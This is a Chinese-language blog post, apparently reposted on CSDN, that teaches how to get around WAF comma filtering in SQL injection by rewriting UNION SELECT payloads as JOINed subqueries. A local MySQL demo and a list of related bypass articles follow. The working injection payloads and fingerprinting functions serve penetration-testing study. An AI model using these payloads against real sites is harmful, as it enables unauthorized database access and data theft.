[SQL注入] 逗号拦截绕过

最新推荐文章于 2021-03-25 05:23:12 发布
最新推荐文章于 2021-03-25 05:23:12 发布
阅读量107 收藏
点赞数
原文链接:http://www.cnblogs.com/i-honey/p/8203954.html
版权

 

在SQL注入时,在确定了注入点后,一般都需要使用联合查询猜表的列数,也就是常见的order by n,n从大到小,直到返回正常,就确定了当前查询的列的个数。

然后再使用 UNION SELECT 1,2,3,4,5,6,7..n 这样的格式爆显示位,然后再 UNION SELECT 1,2,3,4,database(),6,7..n ,这是一个常规流程,语句中包含了多个逗号。

但是如果有WAF拦截了逗号时,我们的联合查询就被拦截了。

如果想绕过,就需要使用 Join 方法绕过。join的介绍看我的另一篇文章。

 

其实就简单的几句,在显示位上替换为常见的注入变量或其它语句:

union select 1,2,3,4;
union select * from ((select 1)A join (select 2)B join (select 3)C join (select 4)D);
union select * from ((select 1)A join (select 2)B join (select 3)C join (select group_concat(user(),' ',database(),' ',@@datadir))D);

 

常用数据库变量:

User() 查看用户 
database() --查看数据库名称 
Version() --查看数据库版本 
@@datadir --数据库路径
@@version_compile_os--操作系统版本 
system_user() --系统用户名 
current_user()--当前用户名 
session_user()--连接数据库的用户名

 

 

 

 

举例:

1. 假设我有一个表user,有5个列(字段),2行记录:

mysql> show tables;
+--------------------------+
| Tables_in_gogs           |
+--------------------------+
| user                     |
| version                  |
+--------------------------+
2 rows in set (0.00 sec)

mysql> desc user;
+----------------------+---------------+------+-----+---------+----------------+
| Field                | Type          | Null | Key | Default | Extra          |
+----------------------+---------------+------+-----+---------+----------------+
| id                   | bigint(20)    | NO   | PRI | NULL    | auto_increment |
| name                 | varchar(255)  | NO   | UNI | NULL    |                |
| email                | varchar(255)  | NO   |     | NULL    |                |
| passwd               | varchar(255)  | NO   |     | NULL    |                |
| salt                 | varchar(10)   | NO   |     | NULL    |                |
+----------------------+---------------+------+-----+---------+----------------+
5 rows in set (0.01 sec)

mysql> select id,name,email,passwd from user;
+----+-----------+------------------+------------------------------------------------------------------------------------------------------+
| id | name      | email            | passwd                                                                                               |
+----+-----------+------------------+------------------------------------------------------------------------------------------------------+
|  1 | zhangsan  | 11111@qq.com     | eeb8ecb282bcc107c36d9d46826db5b86b9a9f2d2c2c3df237184d47fa97cee74ebea158bc4b5e27ad4a5f8e0ea925bbcf5e |
|  2 | ihoney    | 102505481@qq.com | a0d63e18d85bc5be5d2d133d1c01d33b2c6653e037afd018a1078e4703ac278c51801d47fcaaee7a6ad8a26d6a3373b7d0af |
+----+-----------+------------------+------------------------------------------------------------------------------------------------------+
2 rows in set (0.00 sec)

  

2. UNION开头的是我们在URL中注入的语句,这里只是演示,在实际中如果我们在注入语句中有逗号就可能被拦截。

mysql> select id,name,email,passwd from user union select 1,2,3,4;
+----+-----------+------------------+------------------------------------------------------------------------------------------------------+
| id | name      | email            | passwd                                                                                               |
+----+-----------+------------------+------------------------------------------------------------------------------------------------------+
|  1 | zhangsan  | 11111@qq.com     | eeb8ecb282bcc107c36d9d46826db5b86b9a9f2d2c2c3df237184d47fa97cee74ebea158bc4b5e27ad4a5f8e0ea925bbcf5e |
|  2 | ihoney    | 102505481@qq.com | a0d63e18d85bc5be5d2d133d1c01d33b2c6653e037afd018a1078e4703ac278c51801d47fcaaee7a6ad8a26d6a3373b7d0af |
|  1 | 2         | 3                | 4                                                                                                    |
+----+-----------+------------------+------------------------------------------------------------------------------------------------------+
3 rows in set (0.00 sec)

  

3. 不出现逗号,使用Join来继续注入

mysql> select id,name,email,passwd from user union select * from ((select 1)A join (select 2)B join (select 3)C join (select 4)D);
+----+-----------+------------------+------------------------------------------------------------------------------------------------------+
| id | name      | email            | passwd                                                                                               |
+----+-----------+------------------+------------------------------------------------------------------------------------------------------+
|  1 | zhangsan  | 11111@qq.com     | eeb8ecb282bcc107c36d9d46826db5b86b9a9f2d2c2c3df237184d47fa97cee74ebea158bc4b5e27ad4a5f8e0ea925bbcf5e |
|  2 | ihoney    | 102505481@qq.com | a0d63e18d85bc5be5d2d133d1c01d33b2c6653e037afd018a1078e4703ac278c51801d47fcaaee7a6ad8a26d6a3373b7d0af |
|  1 | 2         | 3                | 4                                                                                                    |
+----+-----------+------------------+------------------------------------------------------------------------------------------------------+
3 rows in set (0.00 sec)

  

4. 绕过之后就可以替换显示的数字位继续注入获取数据库及系统信息 

mysql> select id,name,email,passwd from user union select * from ((select 1)A join (select 2)B join (select 3)C join (select group_concat(user(),' ',database(),' ',@@datadir))D);
+----+-----------+------------------+------------------------------------------------------------------------------------------------------+
| id | name      | email            | passwd                                                                                               |
+----+-----------+------------------+------------------------------------------------------------------------------------------------------+
|  1 | zhangsan  | 11111@qq.com     | eeb8ecb282bcc107c36d9d46826db5b86b9a9f2d2c2c3df237184d47fa97cee74ebea158bc4b5e27ad4a5f8e0ea925bbcf5e |
|  2 | ihoney    | 102505481@qq.com | a0d63e18d85bc5be5d2d133d1c01d33b2c6653e037afd018a1078e4703ac278c51801d47fcaaee7a6ad8a26d6a3373b7d0af |
|  1 | 2         | 3                | root@localhost gogs /var/lib/mysql/                                                                  |
+----+-----------+------------------+------------------------------------------------------------------------------------------------------+
3 rows in set (0.00 sec)

  

 

转载于:https://www.cnblogs.com/i-honey/p/8203954.html

weixin_30399797
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
关于SQL注入绕过逗号过滤
weixin_43247256的博客
01-27 6929
CTF sql注入题目。
mysql注入过滤逗号_SQL注入绕过的技巧总结
weixin_42488542的博客
02-02 1821
前言sql注入在很早很早以前是很常见的一个漏洞。后来随着安全水平的提高,sql注入已经很少能够看到了。但是就在今天,还有很多网站带着sql注入漏洞在运行。稍微有点安全意识的朋友就应该懂得要做一下sql注入过滤SQL注入绕过技巧有很多,具体的绕过技巧需要看具体的环境,而且很多的绕过方法需要有一个实际的环境,最好是你在渗透测试的过程中遇到的环境,否则如果仅仅是自己凭空想,那显然是不靠谱的。这篇文章...
mysql注入过滤逗号_[SQL注入] 逗号拦截绕过
weixin_39906245的博客
02-02 926
SQL注入时,在确定了注入点后,一般都需要使用联合查询猜表的列数,也就是常见的order by n,n从大到小,直到返回正常,就确定了当前查询的列的个数。然后再使用 UNION SELECT 1,2,3,4,5,6,7..n 这样的格式爆显示位,然后再 UNION SELECT 1,2,3,4,database(),6,7..n ,这是一个常规流程,语句中包含了多个逗号。但是如果有WAF拦截了逗...
mysql注入过滤逗号,SQL注入简单总结——过滤逗号注入
weixin_33806343的博客
03-18 918
最近做了一些CTF题目,发现sql题目很喜欢出过滤","的题目,借此机会特此总结。并且我有一个想法能够通过编写tamper尽量多的解决sql注入的题目。在使用盲注的时候,需要使用到substr(),mid(),limit。这些子句方法都需要使用到逗号。对于substr()和mid()这两个方法可以使用from to的方式来解决:select substr(database() from 1 for...
mysql注入过滤逗号_SQL注入--显注和盲注中过滤逗号绕过
weixin_32463071的博客
01-30 716
SQL注入逗号绕过1.联合查询显注绕过逗号在联合查询时使用 UNION SELECT 1,2,3,4,5,6,7..n 这样的格式爆显示位,语句中包含了多个逗号,如果有WAF拦截逗号时,我们的联合查询不能用了。绕过在显示位上替换为常见的注入变量或其它语句union select 1,2,3;union select * from ((select 1)A join (select 2)B joi...
sql注入绕过方法总结
12-19
sql注入绕过方法总结,绕过waf,D盾
SQL注入技巧之显注与盲注中过滤逗号绕过详析
09-09
SQL注入绕过技巧有很多,下面这篇文章主要给大家介绍了关于SQL注入技巧之显注与盲注中过滤逗号绕过的相关资料,文中通过示例代码介绍的非常详细,需要的朋友们下面随着小编来一起学习学习吧
SQL注入绕过实战案例
08-31
本文将深入探讨SQL注入的概念、工作原理,并通过"SQL注入实战案例"来阐述如何进行有效防御和绕过。我们将基于sqli-labs-master靶场进行学习,这是一个专门用于SQL注入攻防演练的平台。 SQL注入(SQL Injection)是...
SQL注入绕过的技巧总结
09-09
本文主要探讨了三种SQL注入绕过技术:引号绕过逗号绕过以及比较符(<, >)绕过,这些都是在SQL防注入措施下仍能实施攻击的有效手段。 首先,**引号绕过** 是针对那些过滤了单引号(')或双引号(")的系统。...
SQL注入绕过 单引号 限制继续注入
01-02
包括我写的那篇《SQL Injection的实现与应用》也是这样的例子,因为没有碰到任何的过滤,所以使我们相当轻松就注入成功了,如下: 代码如下: //www.jb51.net/show.asp?id=1;exec master.dbo.xp_cmdshell ...
SQL注入简单总结——过滤逗号注入.pdf
04-08
SQL注入简单总结——过滤逗号注入
SQL注入--显注和盲注中过滤逗号绕过
diecai2192的博客
08-16 1477
SQL注入逗号绕过 1.联合查询显注绕过逗号 在联合查询时使用 UNION SELECT 1,2,3,4,5,6,7..n 这样的格式爆显示位,语句中包含了多个逗号,如果有WAF拦截逗号时,我们的联合查询不能用了。 绕过 在显示位上替换为常见的注入变量或其它语句 union select 1,2,3; union select * from ((select 1)A join (se...
mysql注入过滤逗号,突破 Sql 防注入过滤程序继续注入的一点方法
weixin_42565971的博客
03-18 169
现在网上流传很多防注入代码。这些真的有用吗?这是在网上找的一个防注入代码例如:''''--------定义部份------------------Dim Fy_Post,Fy_Get,Fy_In,Fy_Inf,Fy_Xh,Fy_db,Fy_dbstr''''自定义需要过滤的字串,用 "|" 分隔Fy_In = "''''|;|and|exec|insert|select|delete|update...
php 防注入 过滤逗号,SQL注入逗号过滤绕过
weixin_34900470的博客
03-25 344
在常规CTF的sql注入的时候都会过滤一些我们不喜欢被过滤的字符,比如这次的逗号,在盲注的时候用到substr函数和union的查询都用到了逗号过滤逗号怎么绕过呢?百度了一番。。。。。百度真是。。。。。还是谷歌吧,终于找到了一些方法,这里记录下来最简单的吧0x0盲注我们用sqli-labs平台练手,http://127.0.0.1/sqli-labs/Less-1/index.php?id=1...
SQL注入逗号拦截绕过
xuchen16的博客
09-30 2990
转载自:https://www.cnblogs.com/nul1/p/9333599.html 目前所知博主仅知的两个方法 1.通过case when then 2.join [一]case when then   mysql&gt; select * from lbcms_admin where adminname like "%a%" union select 1,2,3,4...
SQL注入补充--不加逗号SQL注入
weixin_43858799的博客
05-15 814
针对一些题目比较坑,会过滤逗号,所以一般的SQL注入都会失效 这里提供一种无逗号的注入方式: 1’ union select * from (select database()) a join (select version() ) b %23 //爆库 1’ union select * from (select group_concat(table_name) from informa...
mysql盲注绕过_SQL注入技巧之显注与盲注中过滤逗号绕过详析
weixin_26820341的博客
01-27 277
前言sql注入在很早很早以前是很常见的一个漏洞。后来随着安全水平的提高,sql注入已经很少能够看到了。但是就在今天,还有很多网站带着sql注入漏洞在运行。下面这篇文章主要介绍了关于SQL注入逗号绕过的相关内容,分享出来供大家参考学习,下面话不多说了,来一起看看详细的介绍吧1.联合查询显注绕过逗号在联合查询时使用 UNION SELECT 1,2,3,4,5,6,7..n 这样的格式爆显示位,语句中...
SQL注入一些过滤绕过总结
热门推荐
weixin_44300286的博客
07-20 1万+
前言: 前几天做了几道SQL注入的题,一上去就遇到这样那样的过滤,弄得我很难受,所以这里写一篇关于过滤一些的总结。 1、过滤关键字 过滤关键字应该是最常见的过滤了,因为只要把关键字一过滤,你的注入语句基本就不起作用了。 绕过方法: (1)最常用的绕过方法就是用/**/,<>,分割关键字 sel<>ect sel/**/ect (2)根据过滤程度,有时候还可以用双写绕过 s...
sql注入引号转义绕过
最新发布
04-20
SQL注入是一种常见的安全漏洞,攻击者通过在用户输入的数据中插入恶意的SQL代码,从而绕过应用程序的验证和过滤机制,进而执行恶意操作。其中,注入引号转义绕过是一种常见的注入技巧。 在SQL语句中,引号通常用于...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值